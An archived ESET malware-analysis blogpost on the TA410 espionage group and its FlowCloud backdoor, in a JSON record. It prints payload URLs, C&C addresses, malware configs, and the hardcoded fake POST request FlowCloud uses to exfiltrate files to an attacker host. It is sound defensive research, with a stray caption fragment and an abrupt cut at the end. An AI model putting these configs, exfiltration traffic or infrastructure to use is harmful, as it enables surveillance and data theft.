{
	"id": "4ad9d649-c142-4cce-9ea8-8500e34d101c",
	"created_at": "2026-04-06T00:16:48.247672Z",
	"updated_at": "2026-04-10T03:33:45.877761Z",
	"deleted_at": null,
	"sha1_hash": "87d35f03223812c5b64a7ffcc39fbbcef645e5b9",
	"title": "A lookback under the TA410 umbrella: Its cyberespionage TTPs and activity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2785710,
	"plain_text": "A lookback under the TA410 umbrella: Its cyberespionage TTPs and\r\nactivity\r\nBy Alexandre Côté CyrMatthieu Faou\r\nArchived: 2026-04-05 13:21:51 UTC\r\nESET researchers have documented and analyzed TA410 activity going back to 2019. TA410 is a cyberespionage umbrella\r\ngroup loosely linked to APT10, known mostly for targeting US-based organizations in the utilities sector, and diplomatic\r\norganizations in the Middle East and Africa. TA410 has been active since at least 2018 and was first publicly revealed in\r\nAugust 2019 by Proofpoint in its LookBack blogpost. A year later, the then-new and very complex malware family called\r\nFlowCloud was also attributed to TA410.\r\nIn this blogpost, we provide a detailed profile of this APT group, including its modus operandi and toolset that includes a\r\nnew version of FlowCloud, discovered by ESET. This very complex backdoor contains interesting espionage capabilities.\r\nESET will present its latest findings about TA410, including results from ongoing research, during Botconf 2022. For YARA\r\nand Snort rules, consult ESET's GitHub account.\r\nKey points in this blogpost:\r\nTA410 is an umbrella group comprised of three teams ESET researchers named FlowingFrog, LookingFrog,Decrypt\r\nand inject   shellcode and JollyFrog, each with its own toolset and targets.\r\nESET telemetry shows victims all around the world, mainly in the governmental and education sectors.\r\nTA410 had access to the most recent known Microsoft Exchange remote code execution vulnerabilities, e.g.,\r\nProxyLogon in March 2021 and ProxyShell in August 2021.\r\nESET researchers found a new version of FlowCloud, a complex and modular C++ RAT. 
It has several interesting\r\ncapabilities, including:\r\nControlling connected microphones and triggering recording when sound levels above a specified threshold\r\nvolume are detected.\r\nMonitoring clipboard events to steal clipboard content.\r\nMonitoring file system events to collect new and modified files.\r\nControlling attached camera devices to take pictures of the compromised computer’s surroundings.\r\nFlowCloud deploys a rootkit to hide its activity on the compromised machine.\r\nThe LookBack backdoor utilized by TA410 uses a custom network protocol, which can function over HTTP or raw\r\nTCP, for C\u0026C server communications.\r\nTA410 is one of the users of the Royal Road malicious document builder.\r\nTA410 teams compromise their targets in various ways, which indicates to us that those victims are targeted specifically,\r\nwith the attackers choosing which entry method has the best chance of infiltrating the target.\r\nThe first stage of the FlowCloud version identified by ESET researchers can check whether specific security software is\r\ninstalled on the machine it tries to compromise, but this isn’t implemented in the loaders we analyzed. However, we found a\r\ncustom AntivirusCheck class, which can check running processes against a hardcoded list of executable filenames from\r\nknown security products, including ESET products. In case one of these products is detected, FlowCloud goes through its\r\nregular loading process and cancels the auto_start_after_install configuration value.\r\nEven though we believe that this version of FlowCloud is still undergoing development and testing, the cyberespionage\r\ncapabilities of this version include the ability to collect mouse movements, keyboard activity, and clipboard content along\r\nwith information about the current foreground window. 
This information can help attackers understand stolen data by\r\ncontextualizing it.\r\nFlowCloud can also gather information about things happening around the victim’s computer by taking pictures using\r\nconnected camera peripherals and recording audio using a computer’s microphone. This latter function is triggered by any\r\nsound over a threshold of 65 decibels, which is in the upper range of normal conversation volume.\r\nAttribution\r\nESET researchers believe that TA410 is composed of three different teams, using very similar tactics, techniques, and\r\nprocedures (TTPs) but different toolsets and exiting from IP addresses located in three different districts. These teams,\r\nreferred to below as FlowingFrog, LookingFrog, and JollyFrog, have overlaps in TTPs, victimology, and network\r\ninfrastructure.\r\nFlowingFrog uses Royal Road RTF documents, a first-stage implant called Tendyron, and a very complex second-stage backdoor called FlowCloud.\r\nLookingFrog uses a first-stage backdoor called X4, and LookBack as a second stage.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 1 of 26\n\nJollyFrog uses only generic malware families such as Korplug (aka PlugX) and QuasarRAT. Part of the activity of\r\nthis team was described by Fortinet, who attributed the activity to APT10. ESET researchers, however, believe this\r\nactivity is different from the operations that APT10 (aka A41APT) has conducted recently.\r\nFlowingFrog and JollyFrog share network infrastructure – more precisely, the domain ffca.caibi379[.]com, as mentioned by\r\nProofpoint.\r\nFlowingFrog and LookingFrog ran a phishing campaign at the same time against the same targets, as also mentioned in the\r\nsame Proofpoint article.\r\nIn ESET telemetry, we do not see any other overlap between these subgroups. 
We believe that these subgroups operate\r\nsomewhat independently but that they may share intelligence requirements, an access team that runs their spearphishing\r\ncampaigns, and also the team that deploys network infrastructure.\r\nVictimology\r\nMost TA410 targets are high-profile organizations in the diplomacy and education sectors, but we have also seen victims in\r\nthe military sector, a manufacturing company in Japan, a mining company in India, and a charity in Israel. According to\r\nESET telemetry, the victims are located in Africa, Asia, the Middle East, and Europe. Interestingly, there is no clear\r\nsegmentation of the targeting (by sector or geography) among the different teams.\r\nAn element worth mentioning is that TA410 targets foreign individuals in China. In ESET telemetry, we have observed this\r\nas having happened at least twice: for instance, one victim is a French academic, and another is a member of a diplomatic\r\nmission of a South Asian country in China.\r\nSince 2018, we have seen the following targets, also depicted in Figure 1:\r\nFlowingFrog: University, foreign diplomatic mission of a South Asian country in China, mining company\r\nLookingFrog: Diplomatic missions, charity, government and industrial manufacturing\r\nJollyFrog: Education, church, military, diplomatic mission\r\nFigure 1. Map of countries and verticals targeted by TA410\r\nInitial compromise and typical TTPs\r\nIf we exclude the different backdoors, the three teams use a similar modus operandi. They compromise their targets either by\r\nspearphishing, according to Proofpoint, or, for LookingFrog and JollyFrog, by compromising a web-facing application such\r\nas Microsoft Exchange or SharePoint. This could indicate that victims are targeted specifically, with the attackers choosing\r\nwhich entry method is the best for a given target.\r\nThe public-facing application compromise approach is what we have seen the most. 
Attackers linked to LookingFrog\r\nexploited Microsoft SharePoint servers in 2019 to gain code execution, probably by leveraging CVE-2019-0604. They then\r\ndropped an ASPX webshell that was used to install other malicious components. These were either dropped directly via the\r\nwebshell or downloaded from a remote server using certutil.exe, a known LOLBin.\r\nIn 2020, we saw further exploitations by JollyFrog of Microsoft SQL servers and IIS servers running custom applications.\r\nIn August 2021, we observed LookBack being loaded by an IIS worker process on a server belonging to an industrial\r\nmanufacturing company in Japan. This happened following the exploitation of the Exchange ProxyShell vulnerability on\r\nthat server, as we describe in ESET Threat Report T3 2021.\r\nThis shows that LookingFrog operators closely follow the discovery of RCE vulnerabilities in popular server applications\r\nand quickly make use of any available exploit in order to gain control of unpatched servers run by organizations on their\r\ntarget lists.\r\nIn addition to the full-featured backdoors analyzed in the following sections, these attackers use a variety of tools such as\r\nvulnerability scanners, exploits from the Equation Group leaks, proxy/tunneling utilities (HTran, LCX, EarthWorm), and\r\nlateral movement scripts such as WMIExec.\r\nArsenal\r\nTA410 – FlowingFrog\r\nFlowingFrog uses a first stage that ESET researchers have named the Tendyron downloader, and a complex second stage\r\nnamed FlowCloud, so named by the developers in its modules’ PDB paths.\r\nRoyal Road and Tendyron downloader\r\nRoyal Road is a malicious document builder used by several cyberespionage groups (see the analysis by nao_sec). Files\r\nbuilt with this tool are RTF documents exploiting Equation Editor N-day vulnerabilities such as CVE-2017-11882. 
TA410\r\noperators always use the Royal Road encoding bytes: A9 A4 6E FE, as seen in Figure 2.\r\nFigure 2. Encoded Royal Road payload\r\nOn October 13th 2020, we noticed that a new Royal Road RTF document, shown in Figure 3, had been uploaded to\r\nVirusTotal.\r\nFigure 3. Royal Road RTF document found on VirusTotal\r\n(SHA‑1: ADD5B4FD9AEA6A38B5A8941286BC9AA4FE23BD20)\r\nWhen opened, the document triggers the injection of a custom downloader – a PE executable – into an iexplore.exe process.\r\nThe PE resources 103, 104 and 105 contain the payload URLs, XORed with 0xD3. The following files are downloaded and\r\nwritten to disk:\r\nhttp://103.139.2[.]93:1702/tdr.dat written to %localappdata%\\Tendyron\\Tendyron.exe\r\n(SHA-1: 09C76522136B5E9BAB74381FEEE265F7E9B1D550)\r\nhttp://103.139.2[.]93:1702/okt.dat written to %localappdata%\\Tendyron\\OnKeyToken_KEB.dll\r\n(SHA‑1: F359D3C074135BBCA9A4C98A6B6544690EDAE93D)\r\nhttp://103.139.2[.]93:1702/md.dat written to %localappdata%\\Tendyron\\Tendyron.conf\r\n(we were not able to retrieve this file)\r\nFinally, this process separately downloads http://103.139.2[.]93:1702/t86.dat (resource 101), loads it into memory, and calls\r\nits startModule export. Unfortunately, we were not able to retrieve this sample.\r\nTendyron.exe is a legitimate executable, signed by online-banking security vendor Tendyron Corporation, that is\r\nvulnerable to DLL search-order hijacking. Persistence for the downloaded payload is established via the Tendyron value\r\nunder the Run key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nWhen executed, Tendyron.exe loads the malicious OnKeyToken_KEB.dll. The export OnKeyT_ContextInit contains code\r\nthat decrypts hardcoded shellcode (see Figure 4) and injects it into iexplore.exe using WriteProcessMemory.\r\nFigure 4. 
Shellcode decryption loop\r\nThe next stage, injected into iexplore.exe, is a backdoor written using the Microsoft Foundation Class (MFC) framework. It\r\nalso contains RTTI symbols and thus a few C++ class names:\r\nClientSocket\r\nManager\r\nDllManager\r\nKernelManager\r\nThese class names are the same as used in Farfli/Gh0stRAT, a backdoor that has been used for more than 10 years to conduct\r\n(mostly) cyberespionage operations. Its source code was leaked and is now available on GitHub. Thus, we believe that\r\nTA410 developers reused code copied from Farfli.\r\nThe C\u0026C server is hardcoded, in cleartext, in the sample; in this specific case, it is set to 114.118.83[.]141.\r\nOn VirusTotal, as shown in Figure 5, we can see one more HTTP request to 103.139.2[.]93 was triggered during the\r\nexecution of the RTF file. The result of the request to http://103.139.2[.]93:1702/SL3716/S8437AEB.DAT was recorded by\r\nVirusTotal and the SHA-1 of this encrypted file is 140F81037A76B7B16A00E1D5E0E2CD9F6687F642. This URI is\r\ntypical of those used to download FlowCloud, a complex C++ implant described in the next section.\r\nFigure 5. URL requests seen by the VirusTotal sandbox during execution of the malicious RTF document\r\nThe identical encrypted file was also downloaded from http://114.55.109[.]199:56022/SL3716/S8437AEB.DAT by a\r\nFlowCloud dropper version 4.1.3 (SHA‑1: 014421BDB1EA105A6DF0C27FC114819FF3637704). A summary of the\r\ncompromise chain is provided in Figure 6.\r\nFigure 6. Compromise chain from the Royal Road document to FlowCloud\r\nFlowCloud\r\nFlowCloud is a complex implant written in C++. 
It consists of three main components, deployed in a multistage process that\r\nuses various obfuscation and encryption techniques to hinder analysis. Multiple versions of FlowCloud have been identified\r\nsince 2020, most notably versions 4.1.3 and 5.0.1 described by Proofpoint. In this section, we analyze FlowCloud versions\r\n5.0.2 and 5.0.3. Contrary to those previously found, the samples we obtained for version 5.0.2 contain verbose error\r\nmessages and meticulous logging.\r\nThis deployment process is very similar to the one described by Proofpoint for version 5.0.1. The three main components are\r\na driver with rootkit functionality, a simple persistence module, and a custom backdoor. We describe these in detail in the\r\nupcoming sections.\r\nLoader (ClientLdrExe)\r\nThe first stage is responsible mostly for creating the files and registry keys used by the other stages. The values for these\r\nexecutables and configuration data can be found, encrypted, in the loader’s resource section. Table 1 contains an overview of\r\nthese resources and their use.\r\nTable 1. 
Contents of the dropper’s resources\r\nResource ID | Role | Internal name\r\n100 | FlowCloud RAT DLL | fcClientDll\r\n101 | 32-bit rootkit driver | Driver\r\n102 | 64-bit rootkit driver | Driver\r\n103 | DLL hijacking vulnerable app | N/A\r\n104 | Shellcode loaded by the malicious library in the DLL hijacking | SETLANG_dlcore\r\n105 | Shellcode that loads fcClient (unused) | N/A\r\n106 | Final dropper stage | fcClient\r\n107 | 32-bit persistence module | fcClientWD_x86\r\n108 | 64-bit persistence module | fcClientWD_x64\r\n109 | Legitimate library used for module stomping | slam\r\n110 | DLL used for hijacking | XXXModule_dlcore0\r\n1000 | Protobuf serialized FlowCloud configuration | N/A\r\n1001 | Dropper configuration | N/A\r\n2000 | Used as an alternative or extension to resource 2001 | N/A\r\n2001 | Path to the registry key for the PrintProcessor service (used by the driver) | N/A\r\n10000 | Installation configuration | N/A\r\nIn the instances we observed, most resources are written to disk encrypted, and only decrypted in memory when needed. In\r\nsome cases, they are then re-encrypted but with a different key. This technique makes it harder to dump the plaintext values\r\nfrom the process’s memory and to analyze exit dumps. The paths and registry keys to use, and whether they should be\r\ndecrypted before being written, are defined in the installation configuration. The samples we analyzed all store their files in\r\nthe %ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\ directory; we believe that this is the default value.\r\nFlowCloud uses filenames that are either similar to those of legitimate Windows files (e.g., rebare.dll which could be\r\nmistaken for rebar.dll) or innocuous looking (e.g., AC146142) to avoid suspicion.\r\nFigure 7 presents a graphical overview of the deployment process and its elements. 
We explain each of the steps in further\r\ndetail in the upcoming sections.\r\nFigure 7. FlowCloud deployment process\r\nFirst, the loader decrypts and parses the embedded installation configuration, which uses the Windows INI format. This\r\nconfiguration defines the malware’s install path along with the filename or registry key where each embedded resource is to\r\nbe written. The same values are hardcoded in the following stages, which leads us to think that the samples are generated\r\nusing a builder. In a sample we analyzed, this configuration is accompanied by comments explaining the values for some\r\nsections. Figure 8 shows this installation configuration with the comments translated into English.\r\n#Product name, these will be used in the configuration generator and applied to the front end\r\n[product]\r\nproduct_chs_name=Sky Arrow\r\nproduct_name=PCArrowI\r\nproduct_version=v5.0.2\r\n[general]\r\ncreated_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\r\ninstall_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\r\ndata_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\fcdata\r\nhide_user_activity_tab = 0\r\n#File path, not including drive letter\r\n[file]\r\n100=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\responsor.dat\r\n103=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlang.exe\r\n104=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlangloc.dat\r\n#105=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rebare.dat\r\n106=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure.dat\r\n107=:\\Program 
Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure86.dat\r\n108=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure64.dat\r\n109=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\sspisrvui.dat\r\n110=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlangloc.dll\r\n101=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\E86F36C4\r\n102=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\AC146142\r\n1000=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\E19D9D4B\r\n#0x0001 Release without decryption\r\n#0x0002 Decryption release\r\n[file_out_type]\r\n100=0x0001\r\n103=0x0002\r\n104=0x0002\r\n#105=0x0002\r\n106=0x0002\r\n107=0x0002\r\n108=0x0002\r\n109=0x0002\r\n110=0x0002\r\n101=0x0001\r\n102=0x0001\r\n1000=0x0001\r\n##Registry path: separated by'|', respectively representing HKEY_LOCAL_MACHINE, path name, value name\r\n[key]\r\n##100=0x80000002|SYSTEM\\Setup\\PrintResponsor|1\r\n#101=0x80000002|SYSTEM\\Setup\\PrintResponsor|2\r\n#102=0x80000002|SYSTEM\\Setup\\PrintResponsor|3\r\n#1000=0x80000002|SYSTEM\\Setup\\PrintResponsor|4\r\n##2000=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|1\r\n##2001=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|2\r\n2001=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|1\r\n##0x0001 Release without decryption\r\n##0x0002 Decryption release\r\n[key_out_type]\r\n##100=0x0001\r\n#101=0x0001\r\n#102=0x0001\r\n#1000=0x0001\r\n#2000=0x0002\r\n2001=0x0002\r\n#Service Information: hhw.exe needs to be dynamically generated\r\n[service_attribute]\r\nis_hhw=0\r\nservice_name=PrintResponsor\r\nservice_path=%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlang.exe\r\nservice_parm=\r\nFigure 8. Installation configuration with explanatory comments. 
Note that some fields are commented out.\r\nThe configuration can also contain a section defining specific security software to check for, but this isn’t implemented in\r\nthe loaders we analyzed. However, there is a custom AntivirusCheck class, which can check running processes against a\r\nhardcoded list of XOR-encrypted executable filenames from known security products: 360 Total Security, Avast, Avira,\r\nAVG, Bitdefender, ESET, Jiangmin Technology Antivirus, Kingsoft, McAfee, Micropoint, Norton, Rising Antivirus, and\r\nTrend Micro. This class is only used if the loader is set to directly start the fcClient module via the auto_start_after_install\r\nconfiguration key.\r\nDepending on the configuration keys used, the loader can either load the fcClientDll RAT module directly, thus bypassing\r\nmost of the complex deployment process, or it can create a service or scheduled task. In the latter case, the task or service\r\nattains persistence by being set to start automatically on boot. In the samples we observed, the task or service was\r\nconfigured to execute the next step of the installation process by running a legitimate application vulnerable to DLL search-order hijacking. The application and the accompanying relevant and malicious DLL were both embedded in the loader’s\r\nresources.\r\nDLL side-loading (XXXModule_dlcore0)\r\nIn the samples we analyzed, the vulnerable application was either setlang.exe from Microsoft Office 2003 with a malicious\r\nsetlangloc.dll or vpreview.exe from Visio Preview 2007 with a malicious vviewres.dll. Strings contained in the malicious\r\nDLL also point to emedres.dll from Emurasoft’s EmEditor as a possible third target for DLL side-loading. 
This is a real\r\npossibility as such vulnerabilities were present in older versions of EmEditor, but we did not see any samples using it.\r\nIn all observed samples, the malicious library is the same and serves to load and execute shellcode from a file that is stored\r\nunder the same name as the DLL, but with a .dat extension. We analyze this shellcode in the next section, but first, we want\r\nto look at the notable anti-analysis techniques used in this library.\r\nDespite its relatively simple goals, the library’s code makes heavy use of anti-debugging tricks and control flow obfuscation\r\nto hinder analysis. In the function that loads the next file, the useful code is repeatedly interspersed with the same sequence\r\nof opcodes to obfuscate the program’s flow. As shown in Figure 9, this short snippet is packed full of anti-analysis tricks, but\r\nultimately amounts to an unconditional 16-byte jump. This is enough to foil many automatic analyses, including\r\ndecompilers.\r\nFigure 9. Annotated disassembly of the control flow obfuscation snippet\r\nThe above snippet is bookended by calls to two anti-debugging functions, as can be seen in Figure 10. The function, which\r\nwe named crash_if_debugger in the previous screenshot, calls IsDebuggerPresent and checks some commonly hooked\r\nlibrary functions for a breakpoint as their first instruction. If those checks detect a debugger, the function returns a value that\r\nwill cause the program to jump to an invalid address and crash. The second one raises an exception via the INT 0x2D\r\ninstruction and exits if it was handled by a debugger.\r\nFigure 10. Decompiler view showing the obvious pattern of anti-debugging checks. Note that we had to remove the\r\naforementioned obfuscation for the decompiler to produce any output.\r\nfcClient (rescure.dat)\r\nWhen it is first executed, this module sets up persistence and installs the backdoor, rootkit, and persistence modules. 
It then\r\nsets specific registry keys and files as guardrails to skip the setup on subsequent runs.\r\nFirst, persistence is established by using the ITaskService COM interface to create the\r\n\\Microsoft\\Windows\\CertificateServicesClient\\NetTask scheduled task. If a task with the same name already exists, it is\r\ndeleted before the new one is created. This task will run the DLL hijacking target as SYSTEM at each boot.\r\nAfterwards, the rootkit module is decrypted and written to the %System%\\drivers folder as hidmouse.sys. A hidmouse\r\nservice is then created to run that module and is immediately started. The file is then deleted from the disk and replaced by a\r\ncopy of the legitimate hidusb.sys driver from the same folder. Thus, anyone looking at the file on disk rather than the one\r\nmapped into memory would see a legitimate, benign file.\r\nOn Windows 10 machines, the system time is briefly changed to make it look like the service was created in January 2013.\r\nBoth this and the use of the legitimate driver directory help the rootkit blend in with other drivers.\r\nThe following files are copied to the %System% directory:\r\nThe backdoor: rescure.dat\r\nA decoy DLL: sspisrvui.dat as sspisrvui.dll (timestomped to July 2013)\r\nThe encrypted shellcode: rebare.dat\r\nThe rebare.dat shellcode is very similar to that used in the self-decrypting DLL, but it loads fcClient directly.\r\nFlowCloud then starts a suspended process to perform injection on it. This process is created via CreateProcessAsUserW\r\nusing a token retrieved from the explorer.exe or winlogon.exe process in the current session.\r\nThe injected code loads the same backdoor (rescure.dat) into the process’s memory and calls its startModule export to finish\r\nthe installation. 
Meanwhile, the injection process is terminated.\r\nAt this point, installation of the backdoor is complete. All that is left is to execute the backdoor. To achieve this, the new\r\nprocess loads the decoy DLL and manually replaces its content in memory with the fcClientDll module (a process known as\r\nmodule stomping or DLL hollowing), before calling its main function.\r\nfcClientDll (responsor.dat)\r\nThis complex module is the main component of the backdoor. It provides a wide range of capabilities from full file system\r\naccess to control of camera peripherals and everything in between. Although we did not observe any plugins, the backdoor\r\ncontains code that hints that they can be used to further extend functionality.\r\nBefore diving deeper into the functionalities, we want to highlight some notable characteristics:\r\nConfiguration information and data for communications with the C\u0026C server are Protobuf-serialized, compressed,\r\nand encrypted.\r\nFile exfiltration is done through encrypted, Protobuf-serialized structures and is disguised as HTTP by prepending the\r\ndata with a hardcoded, fake POST request. The Content-Length header is the only variable element, as it is set to the\r\nactual size of the data sent. 
This hardcoded request can be seen in Figure 11.\r\nMultiple functionalities are implemented through the use of COM objects and interfaces.\r\nPOST /messagebroker/amf HTTP/1.1\r\nHost: s.peheavens.com\r\nConnection: keep-alive\r\nContent-Length: \u003ccontent_length\u003e\r\nOrigin: http://s.peheavens.com\r\nX-Requested-With: ShockwaveFlash/20.0.0.306\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\r\nContent-Type: application/x-amf\r\nAccept: */*\r\nReferer: http://s.peheavens.com/html/portlet/ext/draco/resources/draco_manager.swf/[[DYNAMIC]]/1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: COOKIE_SUPPORT=true; JSESSIONID=5C7E7A60D01D2891F40648DAB6CB3DF4.jvm1; COMPANY_ID=10301; ID=666e737554567869564567\r\nFigure 11. Hardcoded, fake HTTP POST request used for FlowCloud C\u0026C communication\r\nThis component uses an encrypted, Protobuf-serialized configuration that it tries to read from a file on disk or a registry key.\r\nThe configurations we observed were composed of three sections:\r\n1. server_config: This section contains information about the C\u0026C servers and identification information about the\r\nvictim and backdoor.\r\n2. policys [sic]: This section defines the behavior of the backdoor’s components and is described in detail in the\r\nfollowing paragraphs.\r\n3. install_config: As the name indicates, this section defines the installation parameters.\r\nAn example of such a server_config is shown in Figure 12. This configuration corresponds to resource 1000 in the initial\r\nloader. It defines the address and port for both the exfiltration server (file_server) and the C\u0026C server (exchange_server),\r\nalong with the encryption key to use for communication with each. 
A fallback server can also be defined for each of these.\r\nThe file_key field defines the encryption key to use when storing files that are to be exfiltrated. The other entries are used to\r\nidentify the backdoor and the victimized host:\r\nproduct_name: A name for the backdoor in use. PCArrowI seems to correspond to FlowCloud.\r\nproduct_version: The backdoor’s version.\r\nid_prefix: This value is prefixed to the generated ID. Presumably used to group victims or campaigns.\r\nid: This value uniquely identifies the victim. Initially, it is empty; the value is generated on the first execution using\r\nthe following format: \u003cprefix\u003e_\u003ccurrent timestamp\u003e_\u003cmachine hostname\u003e\r\nserver_config\r\n{\r\n product_name: \"PCArrowI\"\r\n product_version: \"v5.0.2\"\r\n id: \"1202_[REDACTED]\"\r\n root: \"\"\r\n file_server: \"47.111.22[.]65\"\r\n file_server_port: \"80\"\r\n file_server_bak: \"\"\r\n file_server_bak_port: \"\"\r\n exchange_server: \"47.111.22[.]65\"\r\n exchange_server_port: \"81\"\r\n exchange_server_bak: \"\"\r\n exchange_server_bak_port: \"\"\r\n file_server_key: \"E\\367\\016\\031\u003c…\u003e\"\r\n xchg_server_key: \"8\\335\\325$\u003c…\u003e\"\r\n file_key: \"U\\267\\323\\353\\\u003c…\u003e\"\r\n is_audio_only: false\r\n id_prefix: \"1202\"\r\n}\r\nFigure 12. server_config section of a decoded FlowCloud configuration\r\nFlowCloud’s capabilities are spread out over a series of singleton classes, each of which implements a cohesive set of\r\nfunctionalities related to a specific type of data or action. 
These roughly follow an internal naming convention where classes\r\nwith names ending with manager_handler perform actions in response to C\u0026C commands, while those whose names end\r\nwith manager automatically perform actions based on timers or event listeners.\r\nEach manager stores collected data in its own SQLite database, while data that is collected on demand is returned directly to\r\nthe C\u0026C server. Data is encrypted with the aforementioned file_key before being inserted into the database. The location of\r\nthe SQLite databases is defined by the data_folder install configuration key, with the default value being\r\n%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\fcdata.\r\nThe classes are orchestrated by an instance of fc_kernel_manager. This object is responsible for initializing other\r\ncomponents and handling C\u0026C connections. It can also update the local configuration when the corresponding command is\r\nreceived.\r\nAs shown in Figure 13, parameters and frequency of automated actions can be specified and finely tuned through\r\nconfiguration policies. 
Data exfiltration is likewise automated: policies can contain a cache_size or cache_count parameter,\r\nwhich determines how much data can be collected locally by the corresponding class before it is staged for exfiltration.\r\npolicys {\r\n keyboard_policy {\r\n state: true\r\n cycle_time: 60\r\n limit_size: 100\r\n cache_size: 10\r\n }\r\n screen_policy {\r\n state: true\r\n cycle_time: 30\r\n cache_count: 200\r\n bit_depth: 4\r\n }\r\n audio_policy {\r\n state: false\r\n cache_size: 100\r\n decibel_limit: 65\r\n continue_seconds: 15\r\n }\r\n smfile_search_policy {\r\n guid: \"XXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"\r\n state: false\r\n research: true\r\n inc_all_removable: true\r\n inc_all_fixed: true\r\n limit_size: 1\r\n recent_days: 30\r\n filter: \"*.doc\"\r\n filter: \"*.docx\"\r\n filter: \"*.xls\"\r\n filter: \"*.xlsx\"\r\n filter: \"*.ppt\"\r\n filter: \"*.pptx\"\r\n filter: \"*.bmp\"\r\n filter: \"*.jpg\"\r\n filter: \"*.png\"\r\n filter: \"*.gif\"\r\n cache_size: 1024\r\n b_exclude_system_files: true\r\n b_exclude_system_folders: true\r\n }\r\n installedapp_policy {\r\n state: false\r\n }\r\n clipboard_policy {\r\n state: false\r\n ignore_repeat: true\r\n cycle_time: 300\r\n limit_size: 100\r\n single_limit_size: 10\r\n cache_size: 50\r\n }\r\n user_activity_policy {\r\n process_activity_state: false\r\n browser_activity_state: false\r\n }\r\n}\r\nFigure 13. The policys [sic] section of a decoded FlowCloud config\r\nAs we have previously mentioned, this implant uses a lot of classes. 
Rather than documenting each of them individually, we\r\nwill present an overview of the available functionality by grouping them into three categories: those that interact with the\r\nfile system, functionalities that collect information about programs and processes, and those that gather real-time\r\ninformation about user activity.\r\nFile system\r\nFlowCloud provides interaction with the file system in a variety of ways, most of which can store file metadata and content\r\nin their SQLite database.\r\nOne of these is a component that walks through all mapped file systems and collects files that are not excluded by filters in\r\nthe smfile_search_policy. It also creates an invisible window that listens for file creation, modification, or renaming events.\r\nThe corresponding files are collected unless they are excluded by that policy.\r\nAnother component collects information about mapped volumes, including mount point, name, drive type, and disk usage\r\ndata. This same class collects file and directory metadata.\r\nAs a complement to these automated measures, the backdoor implements functions that provide full access and control over\r\nthe content of mounted drives. This includes bidirectional file transfers between the C\u0026C and the compromised machine.\r\nPrograms and processes\r\nFlowCloud is able to automatically obtain a list of installed software through the use of the undocumented\r\nIShellAppManager COM interface. This functionality can also be invoked via a C\u0026C command. Figure 14 shows, after the\r\nextraneous code has been removed, how that interface is used.\r\nFigure 14. 
Simplified code showing how the IShellAppManager COM interface is used to list installed applications\r\nOther commands can be used to retrieve a detailed list of available services and currently running processes.\r\nAnother interesting feature is the near real-time monitoring of process activity. To achieve this, FlowCloud runs WMI\r\nqueries every second to get all process creation and termination events. The obtained information is correlated with data\r\nfrom the Win32_Process table for a more detailed view.\r\nUser activity\r\nFlowCloud is able to collect a miscellany of data that we have decided to group under the “User activity” umbrella.\r\nIt has the ability to monitor the clipboard for changes and save any data it contains. As seen in Figure 15, it achieves this by\r\ncreating an invisible window with a custom class and registering two clipboard formats. This window uses\r\nAddClipboardFormatListener (on Windows Vista or more recent) or SetClipboardViewer (on Windows XP and prior) to\r\nlisten for clipboard content changes.\r\nFigure 15. Set up monitoring of the clipboard\r\nCollected clipboard content is stored along with information about the current foreground window. This information can\r\nhelp attackers understand the data by contextualizing it.\r\nFlowCloud can periodically take screenshots and store them with information about the foreground process and time since\r\nthe last user input. To limit the disk space used, images where fewer than 5% of the pixels differ from the most recently\r\nstored capture aren’t saved. This feature can also be invoked on demand by the server.\r\nAnother of the backdoor’s components records mouse and keyboard activity to a database. 
It does not collect these directly,\r\nbut instead acts in tandem with the keylogger component of the driver (described in the next section) by reading data from\r\nthe \\\\.\\pipe\\namedpipe_keymousespy_english named pipe.\r\nInterestingly, FlowCloud can also gather information about things happening around the victim’s computer. The first way it\r\ndoes so is through a C\u0026C command that takes a picture using connected camera peripherals. This feature is implemented\r\nusing the CCameraDS class from OpenCV.\r\nThe second way it can collect information about the computer’s surroundings is by recording audio. Much like a voice\r\nassistant, FlowCloud can use a computer’s microphone to listen to its surroundings, but instead of recording being triggered\r\nby a command word, it seems to be triggered by any sound over a threshold defined by the decibel_limit field of the\r\naudio_policy. The default value is 65 decibels, which is in the upper range of normal conversation volume (commonly\r\ndefined to be anywhere between 50 and 70 dB by various sources).\r\nSelf-decrypting DLL (setlangloc.dat)\r\nThe loaded shellcode is a self-decrypting DLL. It first decrypts the embedded DLL using a byte-oriented XOR-and-ADD\r\nscheme (shown in Figure 16). The shellcode we analyzed used the key 0x7B. Once it has decrypted the embedded DLL, the\r\nshellcode manually performs the functions of LoadLibrary and calls the loaded module’s startModule export.\r\nfor (int i=0; i \u003c ciphertext_length; i++)\r\n plaintext[i] = ((encrypted[i] 